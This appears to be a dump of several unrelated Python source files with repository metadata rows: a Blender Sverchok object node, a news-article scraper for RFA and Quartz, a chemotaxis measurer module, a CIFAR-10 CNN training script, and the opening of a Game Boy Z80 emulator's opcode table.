layout.label(text='--None--')
def draw_buttons(self, context, layout):
self.draw_animatable_buttons(layout, icon_only=True)
col = layout.column(align=True)
row = col.row()
op_text = "Get selection" # fallback
callback = 'node.ob3_callback'
try:
addon = context.preferences.addons.get(sverchok.__name__)
if addon.preferences.over_sized_buttons:
row.scale_y = 4.0
op_text = "G E T"
except:
pass
self.wrapper_tracked_ui_draw_op(row, callback, text=op_text).fn_name = 'get_objects_from_scene'
col = layout.column(align=True)
row = col.row(align=True)
row.prop(self, 'sort', text='Sort', toggle=True)
row.prop(self, "modifiers", text="Post", toggle=True)
row.prop(self, "vergroups", text="VeGr", toggle=True)
self.draw_obj_names(layout)
def draw_buttons_ext(self, context, layout):
layout.prop(self, 'draw_3dpanel', text="To Control panel")
self.draw_animatable_buttons(layout)
def draw_buttons_3dpanel(self, layout):
callback = 'node.ob3_callback'
row = layout.row(align=True)
row.label(text=self.label if self.label else self.name)
colo = row.row(align=True)
colo.scale_x = 1.6
self.wrapper_tracked_ui_draw_op(colo, callback, text='Get').fn_name = 'get_objects_from_scene'
def get_verts_and_vertgroups(self, obj_data):
vers = []
vers_grouped = []
for k, v in enumerate(obj_data.vertices):
if self.vergroups and v.groups.values():
vers_grouped.append(k)
vers.append(list(v.co))
return vers, vers_grouped
def get_materials_from_bmesh(self, bm):
return [face.material_index for face in bm.faces[:]]
def get_materials_from_mesh(self, mesh):
return [face.material_index for face in mesh.polygons[:]]
def sv_free(self):
set_sv_depsgraph_need(False)
def process(self):
if not self.object_names:
return
scene = bpy.context.scene
data_objects = bpy.data.objects
outputs = self.outputs
edgs_out = []
vers_out = []
vers_out_grouped = []
pols_out = []
mtrx_out = []
materials_out = []
if self.modifiers:
sv_depsgraph = get_sv_depsgraph()
# iterate through references
for obj in (data_objects.get(o.name) for o in self.object_names):
if not obj:
continue
edgs = []
vers = []
vers_grouped = []
pols = []
mtrx = []
materials = []
with self.sv_throttle_tree_update():
mtrx = obj.matrix_world
if obj.type in {'EMPTY', 'CAMERA', 'LAMP' }:
mtrx_out.append(mtrx)
continue
try:
if obj.mode == 'EDIT' and obj.type == 'MESH':
# Mesh objects do not currently return what you see
# from 3dview while in edit mode when using obj.to_mesh.
me = obj.data
bm = bmesh.from_edit_mesh(me)
vers, edgs, pols = pydata_from_bmesh(bm)
materials = self.get_materials_from_bmesh(bm)
del bm
else:
"""
this is where the magic happens.
because we are in throttled tree update state at this point, we can aquire a depsgraph if
- modifiers
- or vertex groups are desired
"""
if self.modifiers:
obj = sv_depsgraph.objects[obj.name]
obj_data = obj.to_mesh(preserve_all_data_layers=True, depsgraph=sv_depsgraph)
else:
obj_data = obj.to_mesh()
if obj_data.polygons:
pols = [list(p.vertices) for p in obj_data.polygons]
vers, vers_grouped = self.get_verts_and_vertgroups(obj_data)
materials = self.get_materials_from_mesh(obj_data)
edgs = obj_data.edge_keys
obj.to_mesh_clear()
except Exception as err:
print('failure in process between frozen area', self.name, err)
vers_out.append(vers)
edgs_out.append(edgs)
pols_out.append(pols)
mtrx_out.append(mtrx)
materials_out.append(materials)
vers_out_grouped.append(vers_grouped)
if vers_out and vers_out[0]:
outputs['Vertices'].sv_set(vers_out)
outputs['Edges'].sv_set(edgs_out)
outputs['Polygons'].sv_set(pols_out)
if 'MaterialIdx' in outputs:
outputs['MaterialIdx'].sv_set(materials_out)
if 'Vers_grouped' in outputs and self.vergroups:
outputs['Vers_grouped'].sv_set(vers_out_grouped)
outputs['Matrixes'].sv_set(mtrx_out)
outputs['Object'].sv_set([data_objects.get(o.name) for o in self.object_names])
def save_to_json(self, node_data: dict):
node_data['object_names'] = [o.name for o in self.object_names]
def load_from_json(self, node_data: dict, import_version: float):
for named_object in node_data.get('object_names', []):
self.object_names.add().name = named_object
classes = [SvOB3BItemOperator, SvOB3BDataCollection, SVOB3B_UL_NamesList, SvOB3Callback, SvObjectsNodeMK3]
register, unregister = bpy.utils.register_classes_factory(classes)
|
gpl-3.0
| -1,058,146,421,217,799,300
| 33.233516
| 143
| 0.595137
| false
| 3.761244
| false
| false
| false
|
mwweinberg/china-daily-email
|
combine_rfa_qz.py
|
1
|
4422
|
from bs4 import BeautifulSoup
import urllib
#csv is for the csv writer
import csv
#this will hold the output
holder = {}
#opens the input doc
txt = open("qz-rfa.csv")
#is the contents of the doc
#inputs = txt.read()
#opens the output doc
output_txt = open("output.txt", "w")
print txt
def headliner(url):
#iterate through the urls
parsed_urls = csv.reader(url)
for row in parsed_urls:
number = 0
row_contents = row[number]
print row_contents
number += 1
if "rfa" in row_contents:
#opens the url for read access
this_url = urllib.urlopen(row_contents).read()
#creates a new BS holder based on the URL
soup = BeautifulSoup(this_url, 'lxml')
#creates the headline section
headline_text = 'Radio Free Asia: '
headline = soup.find_all('title')
for element in headline:
headline_text += ''.join(element.findAll(text = True)).encode('utf-8').strip()
#creats the body text
#This turns the html text into regular text
article_text = row_contents + "\n" + "\r"
#This finds each paragraph
article = soup.find("div", {"id" : "storytext"}).findAll('p')
#for each paragraph
for element in article:
#add a line break and then the text part of the paragraph
#the .encode part fixes unicode bullshit
article_text += '\n' + ''.join(element.findAll(text = True)).encode('utf-8').strip()
holder[headline_text] = article_text
"""
output_txt.write(str(headline_text))
output_txt.write("\n")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write(str(headline_text))
output_txt.write("\n")
output_txt.write(str(article_text))
output_txt.write("\n")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write("\r")
"""
if "qz" in row_contents:
#opens the url for read access
this_url = urllib.urlopen(row_contents).read()
#creates a new BS holder based on the URL
soup = BeautifulSoup(this_url, 'lxml')
#creates the headline section
headline_text = 'Quartz: '
headline = soup.find_all('h1')
for element in headline:
headline_text += ''.join(element.findAll(text = True)).encode('utf-8').strip()
#creats the body text
#This turns the htlm text into regular text
article_text = row_contents + "\n" + "\r"
#This finds each paragraph
article = soup.find("div", {"class" : "item-body"}).findAll('p')
#for each paragraph
for element in article:
#add a line break and then the text part of the paragraph
#the .encode part fixes unicode bullshit
article_text += '\n' + ''.join(element.findAll(text = True)).encode('utf-8').strip()
holder[headline_text] = article_text
"""
output_txt.write(str(headline_text))
output_txt.write("\n")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write(str(headline_text))
output_txt.write("\n")
output_txt.write(str(article_text))
output_txt.write("\n")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write("\r")
"""
else:
print "not a story from a known source"
headliner(txt)
#this is just for debugging
print holder
#iterates through the headlines in holder and writes them to the doc
#this is the TOC
for head, body in holder.items():
output_txt.write(str(head))
output_txt.write("\r")
output_txt.write("\r")
#iterates through the headlines and body in holder and writes them to doc
#this is the body of the email
for head, body in holder.items():
output_txt.write("\r")
output_txt.write(str(head))
output_txt.write("\r")
output_txt.write("\r")
output_txt.write(str(body))
output_txt.write("\r")
txt.close()
output_txt.close()
|
mit
| 8,655,176,811,197,885,000
| 27.901961
| 100
| 0.55337
| false
| 3.976619
| false
| false
| false
|
eddiejessup/ahoy
|
ahoy/dc_dx_measurers.py
|
1
|
3735
|
from __future__ import print_function, division
from abc import ABCMeta, abstractmethod
import numpy as np
from ciabatta.meta import make_repr_str
from ahoy.ring_buffer import CylinderBuffer
from ahoy import measurers, c_measurers
def get_K(t, dt, t_rot_0):
A = 0.5
ts = np.arange(0.0, t, dt)
gs = ts / t_rot_0
K = np.exp(-gs) * (1.0 - A * (gs + (gs ** 2) / 2.0))
trunc_scale = np.abs(K[K >= 0.0].sum() / K[K < 0.0].sum())
K[K < 0.0] *= trunc_scale
norm_const = np.sum(K * -ts * dt)
K /= norm_const
return K
class DcDxMeasurer(measurers.Measurer):
__metaclass__ = ABCMeta
@abstractmethod
def get_dc_dxs(self):
return
class SpatialDcDxMeasurer(DcDxMeasurer):
def __init__(self, directions, grad_c_measurer):
self.directions = directions
self.grad_c_measurer = grad_c_measurer
def get_dc_dxs(self):
grad_c = self.grad_c_measurer.get_grad_cs()
return np.sum(self.directions.u * grad_c, axis=-1)
def __repr__(self):
fs = [('grad_c_measurer', self.grad_c_measurer)]
return make_repr_str(self, fs)
class TemporalDcDxMeasurer(DcDxMeasurer):
def __init__(self, c_measurer, v_0, dt_mem, t_mem, t_rot_0,
time):
self.c_measurer = c_measurer
self.v_0 = v_0
self.dt_mem = dt_mem
self.t_mem = t_mem
cs = self.c_measurer.get_cs()
n = cs.shape[0]
self.K_dt = get_K(self.t_mem, self.dt_mem, t_rot_0) * self.dt_mem
self.c_mem = CylinderBuffer(n, self.K_dt.shape[0])
self.time = time
# Optimisation, only calculate dc_dx when c memory is updated.
self.dc_dx_cache = np.zeros([n])
self.t_last_update = 0.0
def _iterate(self):
cs = self.c_measurer.get_cs()
self.c_mem.update(cs)
def _get_dc_dxs(self):
return self.c_mem.integral_transform(self.K_dt) / self.v_0
def iterate(self):
t_now = self.time.t
if t_now - self.t_last_update > 0.99 * self.dt_mem:
self._iterate()
self.dc_dx_cache = self._get_dc_dxs()
self.t_last_update = t_now
# TODO: This is bad, it both returns a value *and* has side-effects.
# Iterating the measurer and getting the value should be distinct.
def get_dc_dxs(self):
self.iterate()
return self.dc_dx_cache
def __repr__(self):
fs = [('c_measurer', self.c_measurer), ('v_0', self.v_0),
('dt_mem', self.dt_mem), ('t_mem', self.t_mem),
('t_last_update', self.t_last_update)]
return make_repr_str(self, fs)
def dc_dx_factory(temporal_chemo_flag,
ds=None,
ps=None, v_0=None, dt_mem=None, t_mem=None, t_rot_0=None, time=None,
c_field_flag=None, c_field=None):
if temporal_chemo_flag:
return temporal_dc_dx_factory(ps, v_0, dt_mem, t_mem, t_rot_0, time,
c_field_flag, c_field)
else:
return spatial_dc_dx_factory(ds, c_field_flag, c_field, ps)
def spatial_dc_dx_factory(ds, c_field_flag=None, c_field=None, ps=None):
if not c_field_flag:
grad_c_measurer = c_measurers.ConstantGradCMeasurer(ds.n, ds.dim)
else:
grad_c_measurer = c_measurers.FieldGradCMeasurer(c_field, ps)
return SpatialDcDxMeasurer(ds, grad_c_measurer)
def temporal_dc_dx_factory(ps, v_0, dt_mem, t_mem, t_rot_0, time,
c_field_flag=None, c_field=None):
if not c_field_flag:
c_measurer = c_measurers.LinearCMeasurer(ps)
else:
c_measurer = c_measurers.FieldCMeasurer(c_field, ps)
return TemporalDcDxMeasurer(c_measurer, v_0, dt_mem, t_mem, t_rot_0, time)
|
bsd-3-clause
| 5,803,516,902,066,002,000
| 31.763158
| 86
| 0.584739
| false
| 2.842466
| false
| false
| false
|
Bleyddyn/malpi
|
exp/test.py
|
1
|
5744
|
from time import time
import datetime
import numpy as np
import matplotlib.pyplot as plt
from malpi.cnn import *
from malpi.data_utils import get_CIFAR10_data
from malpi.solver import Solver
from optparse import OptionParser
from malpi.fast_layers import *
def plot_solver(solver):
plt.subplot(2, 1, 1)
plt.plot(solver.loss_history, 'o')
plt.xlabel('iteration')
plt.ylabel('loss')
plt.subplot(2, 1, 2)
plt.plot(solver.train_acc_history, '-o')
plt.plot(solver.val_acc_history, '-o')
plt.legend(['train', 'val'], loc='upper left')
plt.xlabel('epoch')
plt.ylabel('accuracy')
plt.show()
def getCIFAR10(verbose=True):
data = get_CIFAR10_data(num_training=49000)
if verbose:
for k, v in data.iteritems():
print '%s: ' % k, v.shape
return data
def log( message, name='test' ):
logFileName = name + ".log"
fmt = '%Y-%m-%d-%H-%M-%S'
datestr = datetime.datetime.now().strftime(fmt)
with open(logFileName,'a') as outf:
outf.write(datestr + ": " + message + "\n")
def hyperparameterGenerator( oneRun = False ):
variations = np.array([0.9,1.0,1.1])
if oneRun:
reguls = [3.37091767808e-05]
lrs = [0.0002006801544726]
else:
reguls = np.array([3.37091767808e-05]) * variations
lrs = np.array([0.0002006801544726]) * variations
#reguls = 10 ** np.random.uniform(-5, -4, 2) #[0.0001, 0.001, 0.01]
#lrs = 10 ** np.random.uniform(-6, -3, 5) #[1e-4, 1e-3, 1e-2]
#reguls = np.append([3.37091767808e-05],reguls)
#lrs = np.append([0.000182436504066],lrs)
decays = [1.0]
for reg in reguls:
for lr in lrs:
for decay in decays:
hparams = { "reg": reg, "lr": lr, "lr_decay":decay, "epochs":6, "batch_size":50, "update":"adam" }
yield hparams
def train():
name = "ThreeLayerTest2"
# layers = ["conv-8", "maxpool", "conv-16", "maxpool", "conv-32", "fc-10"]
# layer_params = [{'filter_size':3}, {'pool_stride':2, 'pool_width':2, 'pool_height':2},
# {'filter_size':3}, {'pool_stride':2, 'pool_width':2, 'pool_height':2},
# {'filter_size':3},
# {'relu':False}]
layers = ["conv-8", "maxpool", "conv-16", "maxpool", "conv-32", "fc-10"]
layer_params = [{'filter_size':3, 'stride':1, 'pad':1 }, {'pool_stride':2, 'pool_width':2, 'pool_height':2},
{'filter_size':3}, {'pool_stride':2, 'pool_width':2, 'pool_height':2},
{'filter_size':3},
{'relu':False}]
log( "%s = %s" % (name, str(layers)), name )
log( " %s" % (str(layer_params,)), name )
data = getCIFAR10(verbose=False)
model_name = name + ".pickle"
val_accs = []
best_solver = None
best_val_acc = 0.0
best_model = load_malpi( model_name, verbose=False)
if best_model:
best_val_acc = best_model.validation_accuracy
for hparams in hyperparameterGenerator(oneRun=False):
model = MalpiConvNet(layers, layer_params, reg=hparams['reg'], dtype=np.float16, verbose=False)
model.hyper_parameters = hparams
solver = Solver(model, data,
num_epochs=hparams['epochs'], batch_size=hparams['batch_size'],
lr_decay=hparams['lr_decay'],
update_rule=hparams['update'],
optim_config={
'learning_rate': hparams['lr'],
},
verbose=True, print_every=50)
log( "Started training model: %s" % (name,), name=name )
log( " Hyper-parameters: %s" % (str(hparams),), name=name )
solver.train()
log( " Validation Accuracy: %f" % (solver.best_val_acc,) , name=name )
log( "Finished training", name=name )
val_accs.append(solver.best_val_acc)
if solver.best_val_acc > best_val_acc:
best_val_acc = solver.best_val_acc
best_model = model
best_solver = solver
log( "", name=name )
best_model.name = name
best_model.validation_accuracy = best_val_acc
best_model.save(model_name)
#plot_solver(best_solver)
print val_accs
# print('\a') # Sound a bell
# print('\a')
# print('\a')
def classify(data):
model = load_malpi('SimpleTest1.pickle')
scores = model.loss(data)
print scores
def testload():
model = load_malpi('SimpleTest1.pickle')
data = getCIFAR10(verbose=False)
solver = Solver(model, data)
train_acc = solver.check_accuracy(data["X_train"], data["y_train"], num_samples=1000)
val_acc = solver.check_accuracy(data["X_val"], data["y_val"])
print "train acc: %f; val_acc: %f" % (train_acc,val_acc)
def testIM2COL():
conv_param = {'filter_size':3, 'stride':1, 'pad':1 }
x = np.zeros((1,3,32,32))
w = np.zeros((8, 3, 3, 3))
b = np.zeros(8)
x = x.astype(np.float32)
w = w.astype(np.float32)
b = b.astype(np.float32)
conv_forward_im2col(x, w, b, conv_param)
#Try: Conv-64, Conv-64, maxpool, conv-128, conv-128, maxpool, conv-256, conv-256, maxpool, conv-512, conv-512, maxpool, conv-512, conv-512, maxpool, FC-4096, FC-4096, FC-1000, softmax
def describeModel( name ):
model = load_malpi(name+'.pickle')
# if not hasattr(model, 'input_dim'):
# model.input_dim = {}
model.describe()
# model.save(name+'.pickle')
def getOptions():
parser = OptionParser()
parser.add_option("-d","--describe",dest="name",help="Describe a model saved in a pickle file: <name>.pickle");
(options, args) = parser.parse_args()
return (options, args)
if __name__ == "__main__":
(options, args) = getOptions()
if options.name:
describeModel(options.name)
else:
train()
#testIM2COL()
|
mit
| 7,756,415,624,282,956,000
| 32.788235
| 183
| 0.584784
| false
| 3.021568
| true
| false
| false
|
tomis007/pyboi
|
pyboi/processor/z80.py
|
1
|
71153
|
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, PickleType
from ..base import Base
from ctypes import c_int8
from enum import Enum
import pickle
import logging
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(name='z80')
class CpuState(Base):
"""
SQLAlchemy base class to save cpustate.
...
Attributes
----------
id : int
primary key for database
savename : string
game save name
gbregisters : pickle
pickled list of the cpu registers A-F
stack_ptr : int
the stack pointer
program_ctr : int
the program counter
"""
__tablename__ = 'cpuState'
id = Column(Integer, primary_key=True)
savename = Column(String)
gbregisters = Column(PickleType)
stack_ptr = Column(Integer)
program_ctr = Column(Integer)
def __repr__(self):
return "<CPU_STATE(savename=%r>" % self.savename
class Z80():
"""
An implementation of the gameboy's ~z80 (similar) cpu.
...
Attributes
----------
reg : list of ints
registers A-F in the z80 cpu
pc : int
program counter
sp : int
stack pointer
mem : Memory
memory object for this processor's memory
opcodes : Dictionary
function dictionary for dispatching the opcodes
"""
def __init__(self, mem):
"""
__init__ function
...
Refer to Z80 class documentation for attribute info.
"""
self.count = 0
self.reg = [0 for _ in range(8)]
# register index constants
self.A = 0
self.B = 1
self.C = 2
self.D = 3
self.E = 4
self.F = 5
self.H = 6
self.L = 7
# register enums
self.reg_pairs = Enum('RegPairs', 'HL BC DE AF')
self.load_vals = Enum('ImmediateByte', 'N NN SP')
self.HL = self.reg_pairs.HL
self.BC = self.reg_pairs.BC
self.DE = self.reg_pairs.DE
self.AF = self.reg_pairs.AF
self.N = self.load_vals.N
self.NN = self.load_vals.NN
self.SP = self.load_vals.SP
self.flags = Enum('Flags', 'Z N H C')
#pc/sp
self.pc = 0x100
self.sp = 0xfffe
self.interrupt_enable = False
self.mem = mem
#timers
self.div_clock = 0
self.tima_clock = 0
self.opcodes = {
0x76: lambda: self.halt(),
0xcb: lambda: self.extended_opcode(),
0xf3: lambda: self.disable_interrupts(),
0xd9: lambda: self.ret_interrupts(),
0x00: lambda: self.NOP(),
0x06: lambda: self.ld_byte_n(self.B),
0x0e: lambda: self.ld_byte_n(self.C),
0x16: lambda: self.ld_byte_n(self.D),
0x1e: lambda: self.ld_byte_n(self.E),
0x26: lambda: self.ld_byte_n(self.H),
0x2e: lambda: self.ld_byte_n(self.L),
0x7f: lambda: self.ld_r1_r2(self.A, self.A),
0x78: lambda: self.ld_r1_r2(self.A, self.B),
0x79: lambda: self.ld_r1_r2(self.A, self.C),
0x7a: lambda: self.ld_r1_r2(self.A, self.D),
0x7b: lambda: self.ld_r1_r2(self.A, self.E),
0x7c: lambda: self.ld_r1_r2(self.A, self.H),
0x7d: lambda: self.ld_r1_r2(self.A, self.L),
0x7e: lambda: self.ld_r1_r2(self.A, self.HL),
0x40: lambda: self.ld_r1_r2(self.B, self.B),
0x41: lambda: self.ld_r1_r2(self.B, self.C),
0x42: lambda: self.ld_r1_r2(self.B, self.D),
0x43: lambda: self.ld_r1_r2(self.B, self.E),
0x44: lambda: self.ld_r1_r2(self.B, self.H),
0x45: lambda: self.ld_r1_r2(self.B, self.L),
0x46: lambda: self.ld_r1_r2(self.B, self.HL),
0x48: lambda: self.ld_r1_r2(self.C, self.B),
0x49: lambda: self.ld_r1_r2(self.C, self.C),
0x4a: lambda: self.ld_r1_r2(self.C, self.D),
0x4b: lambda: self.ld_r1_r2(self.C, self.E),
0x4c: lambda: self.ld_r1_r2(self.C, self.H),
0x4d: lambda: self.ld_r1_r2(self.C, self.L),
0x4e: lambda: self.ld_r1_r2(self.C, self.HL),
0x50: lambda: self.ld_r1_r2(self.D, self.B),
0x51: lambda: self.ld_r1_r2(self.D, self.C),
0x52: lambda: self.ld_r1_r2(self.D, self.D),
0x53: lambda: self.ld_r1_r2(self.D, self.E),
0x54: lambda: self.ld_r1_r2(self.D, self.H),
0x55: lambda: self.ld_r1_r2(self.D, self.L),
0x56: lambda: self.ld_r1_r2(self.D, self.HL),
0x58: lambda: self.ld_r1_r2(self.E, self.B),
0x59: lambda: self.ld_r1_r2(self.E, self.C),
0x5a: lambda: self.ld_r1_r2(self.E, self.D),
0x5b: lambda: self.ld_r1_r2(self.E, self.E),
0x5c: lambda: self.ld_r1_r2(self.E, self.H),
0x5d: lambda: self.ld_r1_r2(self.E, self.L),
0x5e: lambda: self.ld_r1_r2(self.E, self.HL),
0x60: lambda: self.ld_r1_r2(self.H, self.B),
0x61: lambda: self.ld_r1_r2(self.H, self.C),
0x62: lambda: self.ld_r1_r2(self.H, self.D),
0x63: lambda: self.ld_r1_r2(self.H, self.E),
0x64: lambda: self.ld_r1_r2(self.H, self.H),
0x65: lambda: self.ld_r1_r2(self.H, self.L),
0x66: lambda: self.ld_r1_r2(self.H, self.HL),
0x68: lambda: self.ld_r1_r2(self.L, self.B),
0x69: lambda: self.ld_r1_r2(self.L, self.C),
0x6a: lambda: self.ld_r1_r2(self.L, self.D),
0x6b: lambda: self.ld_r1_r2(self.L, self.E),
0x6c: lambda: self.ld_r1_r2(self.L, self.H),
0x6d: lambda: self.ld_r1_r2(self.L, self.L),
0x6e: lambda: self.ld_r1_r2(self.L, self.HL),
0x70: lambda: self.ld_r1_r2(self.HL, self.B),
0x71: lambda: self.ld_r1_r2(self.HL, self.C),
0x72: lambda: self.ld_r1_r2(self.HL, self.D),
0x73: lambda: self.ld_r1_r2(self.HL, self.E),
0x74: lambda: self.ld_r1_r2(self.HL, self.H),
0x75: lambda: self.ld_r1_r2(self.HL, self.L),
0x36: lambda: self.ld_r1_r2(self.HL, self.N),
0x0a: lambda: self.load_a(self.BC),
0x1a: lambda: self.load_a(self.DE),
0xfa: lambda: self.load_a(self.NN),
0x3e: lambda: self.load_a(self.N),
0x7f: lambda: self.write_a(self.A),
0x47: lambda: self.write_a(self.B),
0x4f: lambda: self.write_a(self.C),
0x57: lambda: self.write_a(self.D),
0x5f: lambda: self.write_a(self.E),
0x67: lambda: self.write_a(self.H),
0x6f: lambda: self.write_a(self.L),
0x02: lambda: self.write_a(self.BC),
0x12: lambda: self.write_a(self.DE),
0x77: lambda: self.write_a(self.HL),
0xea: lambda: self.write_a(self.NN),
0xf2: lambda: self.load_a_c(store=False),
0xe2: lambda: self.load_a_c(store=True),
0x3a: lambda: self.load_a_hl(dec=True, load=True),
0x32: lambda: self.load_a_hl(dec=True, load=False),
0x2a: lambda: self.load_a_hl(dec=False, load=True),
0x22: lambda: self.load_a_hl(dec=False, load=False),
0xe0: lambda: self.a_n(True),
0xf0: lambda: self.a_n(False),
0x01: lambda: self.ld_nn(self.BC, set_sp=False),
0x11: lambda: self.ld_nn(self.DE, set_sp=False),
0x21: lambda: self.ld_nn(self.HL, set_sp=False),
0x31: lambda: self.ld_nn(self.sp, set_sp=True),
0xf9: lambda: self.ld_sp_hl(),
0xf8: lambda: self.ldhl_sp(),
0x08: lambda: self.ld_nn_sp(),
0xf5: lambda: self.push_nn(self.A, self.F),
0xc5: lambda: self.push_nn(self.B, self.C),
0xd5: lambda: self.push_nn(self.D, self.E),
0xe5: lambda: self.push_nn(self.H, self.L),
0xf1: lambda: self.pop_nn(self.A, self.F),
0xc1: lambda: self.pop_nn(self.B, self.C),
0xd1: lambda: self.pop_nn(self.D, self.E),
0xe1: lambda: self.pop_nn(self.H, self.L),
0x87: lambda: self.add_a_n(self.A, add_carry=False),
0x80: lambda: self.add_a_n(self.B, add_carry=False),
0x81: lambda: self.add_a_n(self.C, add_carry=False),
0x82: lambda: self.add_a_n(self.D, add_carry=False),
0x83: lambda: self.add_a_n(self.E, add_carry=False),
0x84: lambda: self.add_a_n(self.H, add_carry=False),
0x85: lambda: self.add_a_n(self.L, add_carry=False),
0x86: lambda: self.add_a_n(self.HL, add_carry=False),
0xc6: lambda: self.add_a_n(self.N, add_carry=False),
0x8f: lambda: self.add_a_n(self.A, add_carry=True),
0x88: lambda: self.add_a_n(self.B, add_carry=True),
0x89: lambda: self.add_a_n(self.C, add_carry=True),
0x8a: lambda: self.add_a_n(self.D, add_carry=True),
0x8b: lambda: self.add_a_n(self.E, add_carry=True),
0x8c: lambda: self.add_a_n(self.H, add_carry=True),
0x8d: lambda: self.add_a_n(self.L, add_carry=True),
0x8e: lambda: self.add_a_n(self.HL, add_carry=True),
0xce: lambda: self.add_a_n(self.N, add_carry=True),
0x97: lambda: self.sub_a_n(self.A, sub_carry=False),
0x90: lambda: self.sub_a_n(self.B, sub_carry=False),
0x91: lambda: self.sub_a_n(self.C, sub_carry=False),
0x92: lambda: self.sub_a_n(self.D, sub_carry=False),
0x93: lambda: self.sub_a_n(self.E, sub_carry=False),
0x94: lambda: self.sub_a_n(self.H, sub_carry=False),
0x95: lambda: self.sub_a_n(self.L, sub_carry=False),
0x96: lambda: self.sub_a_n(self.HL, sub_carry=False),
0xd6: lambda: self.sub_a_n(self.N, sub_carry=False),
0x9f: lambda: self.sub_a_n(self.A, sub_carry=True),
0x98: lambda: self.sub_a_n(self.B, sub_carry=True),
0x99: lambda: self.sub_a_n(self.C, sub_carry=True),
0x9a: lambda: self.sub_a_n(self.D, sub_carry=True),
0x9b: lambda: self.sub_a_n(self.E, sub_carry=True),
0x9c: lambda: self.sub_a_n(self.H, sub_carry=True),
0x9d: lambda: self.sub_a_n(self.L, sub_carry=True),
0x9e: lambda: self.sub_a_n(self.HL, sub_carry=True),
0xde: lambda: self.sub_a_n(self.N, sub_carry=True),
0xa7: lambda: self.and_n(self.A),
0xa0: lambda: self.and_n(self.B),
0xa1: lambda: self.and_n(self.C),
0xa2: lambda: self.and_n(self.D),
0xa3: lambda: self.and_n(self.E),
0xa4: lambda: self.and_n(self.H),
0xa5: lambda: self.and_n(self.L),
0xa6: lambda: self.and_n(self.HL),
0xe6: lambda: self.and_n(self.N),
0xb7: lambda: self.or_n(self.A, exclusive_or=False),
0xb0: lambda: self.or_n(self.B, exclusive_or=False),
0xb1: lambda: self.or_n(self.C, exclusive_or=False),
0xb2: lambda: self.or_n(self.D, exclusive_or=False),
0xb3: lambda: self.or_n(self.E, exclusive_or=False),
0xb4: lambda: self.or_n(self.H, exclusive_or=False),
0xb5: lambda: self.or_n(self.L, exclusive_or=False),
0xb6: lambda: self.or_n(self.HL, exclusive_or=False),
0xf6: lambda: self.or_n(self.N, exclusive_or=False),
0xaf: lambda: self.or_n(self.A, exclusive_or=True),
0xa8: lambda: self.or_n(self.B, exclusive_or=True),
0xa9: lambda: self.or_n(self.C, exclusive_or=True),
0xaa: lambda: self.or_n(self.D, exclusive_or=True),
0xab: lambda: self.or_n(self.E, exclusive_or=True),
0xac: lambda: self.or_n(self.H, exclusive_or=True),
0xad: lambda: self.or_n(self.L, exclusive_or=True),
0xae: lambda: self.or_n(self.HL, exclusive_or=True),
0xee: lambda: self.or_n(self.N, exclusive_or=True),
0xbf: lambda: self.cp_n(self.A),
0xb8: lambda: self.cp_n(self.B),
0xb9: lambda: self.cp_n(self.C),
0xba: lambda: self.cp_n(self.D),
0xbb: lambda: self.cp_n(self.E),
0xbc: lambda: self.cp_n(self.H),
0xbd: lambda: self.cp_n(self.L),
0xbe: lambda: self.cp_n(self.HL),
0xfe: lambda: self.cp_n(self.N),
0x3c: lambda: self.inc_n(self.A),
0x04: lambda: self.inc_n(self.B),
0x0c: lambda: self.inc_n(self.C),
0x14: lambda: self.inc_n(self.D),
0x1c: lambda: self.inc_n(self.E),
0x24: lambda: self.inc_n(self.H),
0x2c: lambda: self.inc_n(self.L),
0x34: lambda: self.inc_n(self.HL),
0x3d: lambda: self.dec_n(self.A),
0x05: lambda: self.dec_n(self.B),
0x0d: lambda: self.dec_n(self.C),
0x15: lambda: self.dec_n(self.D),
0x1d: lambda: self.dec_n(self.E),
0x25: lambda: self.dec_n(self.H),
0x2d: lambda: self.dec_n(self.L),
0x35: lambda: self.dec_n(self.HL),
0x09: lambda: self.add_hl(self.B, self.C, add_sp=False),
0x19: lambda: self.add_hl(self.D, self.E, add_sp=False),
0x29: lambda: self.add_hl(self.H, self.L, add_sp=False),
0x39: lambda: self.add_hl(self.B, self.C, add_sp=True),
0xe8: lambda: self.add_sp_n(),
0x03: lambda: self.inc_nn(self.B, self.C, inc_sp=False),
0x13: lambda: self.inc_nn(self.D, self.E, inc_sp=False),
0x23: lambda: self.inc_nn(self.H, self.L, inc_sp=False),
0x33: lambda: self.inc_nn(self.B, self.C, inc_sp=True),
0x0b: lambda: self.dec_nn(self.B, self.C, dec_sp=False),
0x1b: lambda: self.dec_nn(self.D, self.E, dec_sp=False),
0x2b: lambda: self.dec_nn(self.H, self.L, dec_sp=False),
0x3b: lambda: self.dec_nn(self.B, self.C, dec_sp=True),
0xc3: lambda: self.jump_nn(),
0xc2: lambda: self.jump_cc(False, self.flags.Z, immmediate_jump=False),
0xca: lambda: self.jump_cc(True, self.flags.Z, immmediate_jump=False),
0xd2: lambda: self.jump_cc(False, self.flags.C, immmediate_jump=False),
0xda: lambda: self.jump_cc(True, self.flags.C, immmediate_jump=False),
0xe9: lambda: self.jump_hl(),
0x18: lambda: self.jump_n(),
0x20: lambda: self.jump_cc(False, self.flags.Z, immmediate_jump=True),
0x28: lambda: self.jump_cc(True, self.flags.Z, immmediate_jump=True),
0x30: lambda: self.jump_cc(False, self.flags.C, immmediate_jump=True),
0x38: lambda: self.jump_cc(True, self.flags.C, immmediate_jump=True),
0x27: lambda: self.dec_adjust(),
0x2f: lambda: self.complement_a(),
0x3f: lambda: self.complement_cf(),
0x37: lambda: self.set_cf(),
0x07: lambda: self.rotate_l_a_c(),
0x17: lambda: self.rotate_l_a(),
0x0f: lambda: self.rotate_r_a_c(),
0x1f: lambda: self.rotate_r_a(),
0xcd: lambda: self.call(),
0xc4: lambda: self.call_cc(self.flags.Z, False),
0xcc: lambda: self.call_cc(self.flags.Z, True),
0xd4: lambda: self.call_cc(self.flags.C, False),
0xdc: lambda: self.call_cc(self.flags.C, True),
0xc9: lambda: self.ret(),
0xc0: lambda: self.ret_cc(self.flags.Z, False),
0xc8: lambda: self.ret_cc(self.flags.Z, True),
0xd0: lambda: self.ret_cc(self.flags.C, False),
0xd8: lambda: self.ret_cc(self.flags.C, True),
0x10: lambda: self.stop(),
0xc7: lambda: self.restart(0x00),
0xcf: lambda: self.restart(0x08),
